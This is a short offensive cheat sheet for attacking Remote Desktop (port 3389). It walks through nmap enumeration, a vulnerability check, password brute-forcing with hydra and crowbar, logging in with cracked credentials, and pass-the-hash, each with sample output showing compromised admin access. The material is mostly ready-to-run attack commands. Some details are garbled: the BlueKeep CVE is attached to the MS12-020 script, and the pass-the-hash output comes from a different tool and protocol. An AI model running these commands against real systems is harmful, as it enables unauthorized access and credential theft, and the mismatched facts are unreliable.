RDP (3389)

Check if accessible

RDP enum scripts — Version, encryption, NLA

nmap --script rdp-* -p 3389 $IP
Example Output
nmap --script rdp-* -p 3389 10.10.10.5
| rdp-ntlm-info:
|   Target: TARGET
|   DNS: target.corp.local
|   OS: Windows Server 2019
|   NLA: Enabled

BlueKeep check

CVE-2019-0708 — Pre-auth RCE if unpatched

nmap --script rdp-vuln-ms12-020 -p 3389 $IP
Example Output
| rdp-vuln-ms12-020:
|   VULNERABLE:
|   CVE:CVE-2019-0708
(Pre-auth RCE, use with caution - may BSOD)

Brute force

With known usernames — Weak passwords

hydra -l <user> -P passwords.txt rdp://$IP
Example Output
hydra -l administrator -P passwords.txt rdp://10.10.10.5
[3389][rdp] host: 10.10.10.5 login: administrator password: Winter2025!

OR: crowbar -b rdp -s 10.10.10.5/32 -u admin -C passwords.txt
(crowbar is more reliable for RDP brute force)

Connect with found creds

Or rdesktop — Full GUI access

xfreerdp /u:<user> /p:<pass> /v:$IP
Example Output
xfreerdp /u:admin /p:Password123 /v:10.10.10.5
[INFO] Connected to 10.10.10.5:3389
(Full GUI desktop access)

Pass the hash

If you have NTLM hash — No password needed

xfreerdp /u:<user> /pth:<hash> /v:$IP
Example Output
crackmapexec smb 10.10.10.20 -u administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
SMB  10.10.10.20  445  WEB01  [+] CORP\administrator:... (Pwn3d!)
(Admin access with just the hash)